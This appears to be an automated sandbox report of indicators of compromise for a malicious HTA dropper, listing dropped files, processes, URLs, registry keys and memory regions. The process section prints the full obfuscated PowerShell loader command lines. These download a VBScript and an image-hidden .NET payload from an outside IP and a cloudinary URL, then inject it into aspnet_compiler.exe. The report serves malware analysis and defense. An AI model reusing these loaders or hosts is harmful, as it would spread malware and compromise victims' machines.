IOC Report
seemybestdayguvenu.hta

loading gif

Files

File Path
Type
Category
Malicious
seemybestdayguvenu.hta
HTML document, ASCII text, with very long lines (65536), with no line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (372), with no line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\seemybestthingswhatdoingforbe.vbS
Unicode text, UTF-16, little-endian text, with very long lines (3147), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\seemybestthingswhatdoingforbetter[1].tiff
Unicode text, UTF-16, little-endian text, with very long lines (3147), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (361)
dropped
C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.out
Unicode text, UTF-8 (with BOM) text, with very long lines (455), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\3cxbggpe\CSC280B62266E03482F8F906EDB13385254.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\RESA8D6.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x496, 9 symbols, created Sat Dec 7 16:20:57 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qybaiyi.3df.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avvm4dqb.jfk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esvajuva.csa.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hivjqjli.fn2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3jathlj.hsy.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mq213kx4.yq5.ps1
ASCII text, with no line terminators
dropped
There are 7 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\SysWOW64\mshta.exe
mshta.exe "C:\Users\user\Desktop\seemybestdayguvenu.hta"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/C poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.cmdline"
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhatdoingforbe.vbS"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $doctor = 'JGJlaSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRhbW9uaWVtaWEgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRxdWFscXVlciA9ICRhbW9uaWVtaWEuRG93bmxvYWREYXRhKCRiZWkpOyRhdGVycmFnZW0gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVhbHF1ZXIpOyRsZWlyaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGFjYXBuYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGlucXVpZXR1ZGUgPSAkYXRlcnJhZ2VtLkluZGV4T2YoJGxlaXJpYSk7JHBlY3RhciA9ICRhdGVycmFnZW0uSW5kZXhPZigkYWNhcG5hKTskaW5xdWlldHVkZSAtZ2UgMCAtYW5kICRwZWN0YXIgLWd0ICRpbnF1aWV0dWRlOyRpbnF1aWV0dWRlICs9ICRsZWlyaWEuTGVuZ3RoOyRjb25kaWNlbnRlID0gJHBlY3RhciAtICRpbnF1aWV0dWRlOyRuaWNvbGF0byA9ICRhdGVycmFnZW0uU3Vic3RyaW5nKCRpbnF1aWV0dWRlLCAkY29uZGljZW50ZSk7JG1hZHJpbGhlaXJhID0gLWpvaW4gKCRuaWNvbGF0by5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkbmljb2xhdG8uTGVuZ3RoKV07JGNyZWR1bGlkYWRlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbWFkcmlsaGVpcmEpOyRyZWRpemltYXIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjcmVkdWxpZGFkZSk7JHJlYmVsbGFkb3IgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskcmViZWxsYWRvci5JbnZva2UoJG51bGwsIEAoJ3R4dC5BQ01BQy8wNzcvOTIuMzIxLjU0Mi4yNzEvLzpwdHRoJywgJyRyYXBhZG8nLCAnJHJhcGFkbycsICckcmFwYWRvJywgJ2FzcG5ldF9jb21waWxlcicsICckcmFwYWRvJywgJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJzEnLCckcmFwYWRvJykpOw==';$theatrelho = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($doctor));Invoke-Expression $theatrelho
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8D6.tmp" "c:\Users\user\AppData\Local\Temp\3cxbggpe\CSC280B62266E03482F8F906EDB13385254.TMP"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://172.245.123.29/770/seemybestthingswhatdoingforbetter.tIF
172.245.123.29
malicious
http://172.245.123.29/770/CAMCA.txt
172.245.123.29
malicious
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://172.245.123.29/770/seemyb
unknown
https://res.cloudinary.com
unknown
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpgt
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://aka.ms/pscore6lB
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
https://res.cloudinary.com/dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg
unknown
http://172.245.123.29/770/seemybestthingswhatdoingforbetter.tIF&
unknown
There are 10 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
res.cloudinary.com
unknown

IPs

IP
Domain
Country
Malicious
172.245.123.29
unknown
United States
malicious

Registry

Path
Value
Malicious
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
DC0000
direct allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
C80000
heap
page read and write
7D90000
trusted library allocation
page read and write
6EF000
heap
page read and write
154D000
direct allocation
page execute and read and write
EDE6000
trusted library allocation
page read and write
70D0000
trusted library allocation
page read and write
5EE5000
heap
page read and write
5649000
trusted library allocation
page read and write
66FD000
heap
page read and write
3076000
heap
page read and write
2832000
trusted library allocation
page read and write
7C8B000
trusted library allocation
page read and write
1360000
heap
page read and write
5E6F000
heap
page read and write
66F7000
heap
page read and write
73BE000
stack
page read and write
51F0000
heap
page read and write
6724000
heap
page read and write
4E3C000
stack
page read and write
6EB000
heap
page read and write
628E000
heap
page read and write
5E29000
heap
page read and write
50C0000
heap
page read and write
14D0000
heap
page read and write
2870000
trusted library allocation
page execute and read and write
6B1000
heap
page read and write
673D000
heap
page read and write
4D8E000
stack
page read and write
4FE8000
heap
page read and write
305E000
heap
page read and write
8380000
trusted library allocation
page read and write
7445000
heap
page execute and read and write
4610000
heap
page execute and read and write
537000
stack
page read and write
2810000
heap
page read and write
3062000
heap
page read and write
6C1E000
stack
page read and write
6B2000
heap
page read and write
7CAE000
stack
page read and write
4CB7000
heap
page read and write
2F0C000
stack
page read and write
2E90000
heap
page read and write
74E0000
trusted library allocation
page read and write
6731000
heap
page read and write
700000
heap
page read and write
866D000
stack
page read and write
74CB000
stack
page read and write
5260000
heap
page read and write
23D0000
heap
page read and write
673D000
heap
page read and write
706E000
stack
page read and write
7BBD000
stack
page read and write
6688000
trusted library allocation
page read and write
6EB000
heap
page read and write
6722000
heap
page read and write
7505000
trusted library allocation
page read and write
6CF2000
heap
page read and write
69E000
heap
page read and write
5F9D000
heap
page read and write
5E77000
heap
page read and write
673D000
heap
page read and write
5FEC000
trusted library allocation
page read and write
5E31000
heap
page read and write
671B000
heap
page read and write
5D74000
heap
page read and write
4DDF000
stack
page read and write
56CE000
stack
page read and write
7F70000
trusted library allocation
page read and write
DBE000
stack
page read and write
4F70000
heap
page execute and read and write
27E0000
trusted library allocation
page read and write
7A40000
heap
page read and write
5F4E000
heap
page read and write
609B000
trusted library allocation
page read and write
7CC0000
trusted library allocation
page read and write
6744000
heap
page read and write
5F96000
heap
page read and write
6EB000
heap
page read and write
7E20000
heap
page read and write
23CE000
stack
page read and write
88A0000
trusted library allocation
page execute and read and write
5206000
trusted library allocation
page read and write
6724000
heap
page read and write
8AD0000
heap
page read and write
4CED000
trusted library allocation
page execute and read and write
68EF000
stack
page read and write
66AA000
trusted library allocation
page read and write
4FFF000
heap
page read and write
4C69000
heap
page read and write
EDAD000
trusted library allocation
page read and write
6EC000
heap
page read and write
675E000
stack
page read and write
506E000
heap
page read and write
7D72000
heap
page read and write
45FE000
stack
page read and write
3041000
heap
page read and write
4CF0000
trusted library allocation
page read and write
14AE000
stack
page read and write
2F48000
stack
page read and write
57CD000
trusted library allocation
page read and write
6F30000
direct allocation
page read and write
768E000
stack
page read and write
87B0000
heap
page read and write
6EF000
heap
page read and write
543E000
stack
page read and write
700000
heap
page read and write
2850000
trusted library allocation
page read and write
73B000
heap
page read and write
5E82000
heap
page read and write
6EB000
heap
page read and write
EDC0000
trusted library allocation
page read and write
66E7000
heap
page read and write
6094000
trusted library allocation
page read and write
3342000
heap
page read and write
4D90000
heap
page read and write
6E1C000
heap
page read and write
6EAB000
heap
page read and write
83C0000
direct allocation
page read and write
5DAC000
heap
page read and write
12FC000
stack
page read and write
6744000
heap
page read and write
6B1000
heap
page read and write
27CE000
stack
page read and write
50D8000
heap
page read and write
7E0A000
heap
page read and write
503A000
stack
page read and write
552E000
stack
page read and write
55CE000
stack
page read and write
4FC3000
heap
page read and write
514B000
stack
page read and write
5F50000
heap
page read and write
7CE0000
trusted library allocation
page read and write
7DE6000
heap
page read and write
5A5000
heap
page read and write
4D47000
heap
page read and write
7190000
trusted library allocation
page read and write
7B70000
trusted library allocation
page read and write
6E32000
heap
page read and write
6AD000
heap
page read and write
AFB000
stack
page read and write
4D7E000
stack
page read and write
330A000
heap
page read and write
652000
heap
page read and write
5182000
heap
page read and write
3061000
heap
page read and write
7FAA0000
trusted library allocation
page execute and read and write
505C000
heap
page read and write
1940000
heap
page read and write
48A0000
heap
page read and write
5FEB000
trusted library allocation
page read and write
696A000
stack
page read and write
4FCE000
stack
page read and write
6B3000
heap
page read and write
699000
heap
page read and write
5E2F000
heap
page read and write
4D80000
heap
page readonly
5F70000
heap
page read and write
5065000
heap
page read and write
A70000
heap
page read and write
842E000
direct allocation
page read and write
5E3C000
heap
page read and write
A30000
trusted library allocation
page read and write
2914000
heap
page read and write
5180000
heap
page read and write
EDC8000
trusted library allocation
page read and write
5F65000
heap
page read and write
C60000
heap
page read and write
4EBE000
stack
page read and write
7C87000
trusted library allocation
page read and write
671B000
heap
page read and write
7CED000
stack
page read and write
5016000
heap
page read and write
7ACA000
heap
page read and write
305A000
heap
page read and write
EE01000
trusted library allocation
page read and write
754E000
stack
page read and write
5193000
heap
page read and write
696000
heap
page read and write
7A82000
heap
page read and write
5FE5000
trusted library allocation
page read and write
4D15000
trusted library allocation
page execute and read and write
5F9F000
heap
page read and write
690000
heap
page read and write
6A3000
heap
page read and write
305E000
heap
page read and write
DD61000
trusted library allocation
page read and write
69E000
heap
page read and write
7C80000
trusted library allocation
page read and write
5E3E000
heap
page read and write
7C2E000
stack
page read and write
6210000
trusted library allocation
page read and write
A84000
heap
page read and write
4D30000
trusted library allocation
page read and write
8390000
trusted library allocation
page read and write
842E000
direct allocation
page read and write
3042000
heap
page read and write
3056000
heap
page read and write
5E3E000
heap
page read and write
5F50000
heap
page read and write
66DB000
heap
page read and write
5E77000
heap
page read and write
700000
heap
page read and write
CD61000
trusted library allocation
page read and write
3062000
heap
page read and write
66D0000
heap
page execute and read and write
51A3000
heap
page read and write
4FDF000
heap
page read and write
3043000
heap
page read and write
7D00000
trusted library allocation
page execute and read and write
5E7D000
heap
page read and write
52F0000
trusted library allocation
page read and write
6FEE000
stack
page read and write
68AE000
stack
page read and write
6520000
trusted library allocation
page read and write
7180000
trusted library allocation
page read and write
5E3E000
heap
page read and write
B40000
heap
page read and write
3059000
heap
page read and write
505C000
heap
page read and write
2880000
heap
page read and write
307D000
heap
page read and write
263E000
stack
page read and write
5F65000
heap
page read and write
27F0000
trusted library allocation
page read and write
7C1D000
stack
page read and write
6F0C000
stack
page read and write
4DF1000
trusted library allocation
page read and write
5D72000
heap
page read and write
673D000
heap
page read and write
48D0000
heap
page read and write
50E8000
heap
page read and write
4E8F000
stack
page read and write
FFD000
stack
page read and write
17A0000
heap
page read and write
70B0000
trusted library allocation
page read and write
80E0000
trusted library allocation
page read and write
27F4000
trusted library allocation
page read and write
AC91000
trusted library allocation
page read and write
6EEF000
trusted library allocation
page read and write
88EE000
stack
page read and write
3366000
heap
page read and write
73B000
heap
page read and write
517C000
heap
page read and write
7DB9000
heap
page read and write
700000
heap
page read and write
7B80000
heap
page read and write
7B22000
heap
page read and write
51E0000
heap
page read and write
5F45000
heap
page read and write
568A000
trusted library allocation
page read and write
5160000
heap
page read and write
51CB000
heap
page read and write
7BE000
stack
page read and write
6722000
heap
page read and write
5016000
heap
page read and write
4CF9000
trusted library allocation
page read and write
7D30000
trusted library allocation
page read and write
8D11000
trusted library allocation
page read and write
3062000
heap
page read and write
770000
heap
page read and write
5E6C000
heap
page read and write
5F65000
heap
page read and write
7B4A000
trusted library allocation
page read and write
4FC0000
heap
page read and write
6731000
heap
page read and write
5106000
heap
page read and write
2EC0000
heap
page read and write
50D0000
heap
page read and write
AAF000
heap
page read and write
2809000
trusted library allocation
page read and write
6744000
heap
page read and write
6580000
trusted library allocation
page read and write
5FF5000
trusted library allocation
page read and write
682000
heap
page read and write
66E6000
heap
page read and write
2890000
heap
page read and write
8ADB000
heap
page read and write
3055000
heap
page read and write
628F000
heap
page read and write
501B000
heap
page read and write
674A000
heap
page read and write
66FE000
heap
page read and write
787E000
stack
page read and write
5D3D000
heap
page read and write
7F60000
trusted library allocation
page read and write
5E27000
heap
page read and write
6A0000
heap
page read and write
2380000
heap
page read and write
3337000
heap
page read and write
672E000
heap
page read and write
351F000
stack
page read and write
4FD8000
heap
page read and write
66C0000
heap
page read and write
13A9000
direct allocation
page execute and read and write
1280000
direct allocation
page execute and read and write
7BB0000
trusted library allocation
page read and write
4D27000
heap
page read and write
5F96000
heap
page read and write
6AC000
heap
page read and write
5E82000
heap
page read and write
51F1000
heap
page read and write
5D61000
heap
page read and write
32FB000
heap
page read and write
EDC5000
trusted library allocation
page read and write
6744000
heap
page read and write
7140000
trusted library allocation
page read and write
506E000
heap
page read and write
4FC8000
heap
page read and write
4EFE000
stack
page read and write
2680000
heap
page read and write
682000
heap
page read and write
670000
heap
page read and write
612F000
trusted library allocation
page read and write
69EB000
stack
page read and write
533E000
stack
page read and write
5010000
heap
page read and write
570000
heap
page read and write
694000
heap
page read and write
76D0000
heap
page read and write
41B0000
trusted library allocation
page read and write
7D20000
trusted library allocation
page read and write
90F000
stack
page read and write
6722000
heap
page read and write
32D9000
heap
page read and write
2FA1000
heap
page read and write
700000
heap
page read and write
4DE0000
trusted library allocation
page read and write
5E6C000
heap
page read and write
7C6E000
stack
page read and write
4FE9000
heap
page read and write
700000
heap
page read and write
4FC4000
heap
page read and write
32B0000
heap
page read and write
7C5E000
stack
page read and write
673A000
heap
page read and write
6DF0000
heap
page read and write
628F000
heap
page read and write
7DD0000
trusted library allocation
page read and write
41B8000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page read and write
6B4000
heap
page read and write
8400000
direct allocation
page read and write
49D6000
trusted library allocation
page read and write
5E7D000
heap
page read and write
5F65000
heap
page read and write
7D30000
heap
page read and write
AA4000
heap
page read and write
51D8000
heap
page read and write
5F46000
heap
page read and write
2FAF000
heap
page read and write
76CB000
stack
page read and write
1546000
direct allocation
page execute and read and write
6733000
heap
page read and write
C5E000
stack
page read and write
5016000
heap
page read and write
66D5000
heap
page execute and read and write
5F45000
heap
page read and write
686B000
stack
page read and write
2FA6000
heap
page read and write
7D99000
heap
page read and write
4C69000
heap
page read and write
680000
heap
page read and write
303F000
heap
page read and write
5E7A000
heap
page read and write
2EB0000
heap
page read and write
1460000
heap
page read and write
5D75000
heap
page read and write
676D000
heap
page read and write
7D60000
trusted library allocation
page read and write
6C5E000
stack
page read and write
6E2C000
heap
page read and write
6A1000
heap
page read and write
884D000
stack
page read and write
679C000
stack
page read and write
5F86000
heap
page read and write
6732000
heap
page read and write
2FD4000
heap
page read and write
305F000
heap
page read and write
5109000
heap
page read and write
758E000
stack
page read and write
EDFB000
trusted library allocation
page read and write
5EEC000
heap
page read and write
3040000
heap
page read and write
5F65000
heap
page read and write
510B000
heap
page read and write
7D10000
trusted library allocation
page read and write
4CD0000
trusted library allocation
page read and write
519F000
heap
page read and write
305D000
heap
page read and write
692E000
stack
page read and write
686000
heap
page read and write
6EB000
heap
page read and write
572F000
stack
page read and write
5190000
heap
page read and write
6733000
heap
page read and write
28CE000
heap
page read and write
8415000
trusted library allocation
page read and write
702E000
stack
page read and write
6731000
heap
page read and write
5F9E000
heap
page read and write
9711000
trusted library allocation
page read and write
828E000
stack
page read and write
2939000
heap
page read and write
5F86000
heap
page read and write
64B0000
trusted library allocation
page read and write
66C6000
heap
page read and write
501B000
heap
page read and write
524E000
stack
page read and write
5F70000
heap
page read and write
305E000
heap
page read and write
7F32000
trusted library allocation
page read and write
672E000
heap
page read and write
51B3000
heap
page read and write
5621000
trusted library allocation
page read and write
7160000
heap
page read and write
49DA000
trusted library allocation
page read and write
69AD000
stack
page read and write
5F86000
heap
page read and write
439000
stack
page read and write
306C000
heap
page read and write
70E0000
trusted library allocation
page read and write
6744000
heap
page read and write
501B000
heap
page read and write
5EEF000
heap
page read and write
6731000
heap
page read and write
32B6000
heap
page read and write
5EF2000
heap
page read and write
7FAB8000
trusted library allocation
page execute and read and write
5F70000
heap
page read and write
5F44000
heap
page read and write
BB0000
heap
page read and write
580F000
stack
page read and write
51B4000
heap
page read and write
5D6C000
heap
page read and write
51C0000
heap
page read and write
2F5E000
stack
page read and write
5012000
heap
page read and write
5F86000
heap
page read and write
65C0000
trusted library allocation
page read and write
3071000
heap
page read and write
41AE000
stack
page read and write
505C000
heap
page read and write
6A6000
heap
page read and write
64EF000
trusted library allocation
page read and write
6722000
heap
page read and write
501B000
heap
page read and write
2D86000
heap
page read and write
4C5B000
heap
page read and write
6C2F000
stack
page read and write
5FEA000
trusted library allocation
page read and write
5F51000
heap
page read and write
888E000
stack
page read and write
6EB000
heap
page read and write
EDED000
trusted library allocation
page read and write
6728000
heap
page read and write
6600000
trusted library allocation
page read and write
3064000
heap
page read and write
700000
heap
page read and write
4D4B000
heap
page read and write
6240000
heap
page read and write
700000
heap
page read and write
6728000
heap
page read and write
3063000
heap
page read and write
5E7D000
heap
page read and write
570E000
stack
page read and write
307E000
heap
page read and write
41E0000
heap
page read and write
5070000
heap
page read and write
6CDE000
stack
page read and write
584B000
stack
page read and write
51F5000
heap
page read and write
87E0000
trusted library allocation
page read and write
5F81000
trusted library allocation
page read and write
4D49000
heap
page read and write
69C000
heap
page read and write
6AC0000
trusted library allocation
page read and write
305B000
heap
page read and write
4FEE000
heap
page read and write
6EE0000
heap
page read and write
A9A000
heap
page read and write
5EED000
heap
page read and write
4F3F000
stack
page read and write
15C8000
direct allocation
page execute and read and write
4E50000
heap
page read and write
22CC000
stack
page read and write
75CA000
stack
page read and write
5C90000
heap
page read and write
6090000
trusted library allocation
page read and write
180F000
stack
page read and write
5F70000
heap
page read and write
7DD000
stack
page read and write
6714000
heap
page read and write
673E000
heap
page read and write
748D000
stack
page read and write
6F82000
direct allocation
page read and write
66C4000
heap
page read and write
5E33000
heap
page read and write
3079000
heap
page read and write
6EF0000
trusted library allocation
page read and write
8150000
trusted library allocation
page read and write
95A0000
heap
page read and write
51EC000
heap
page read and write
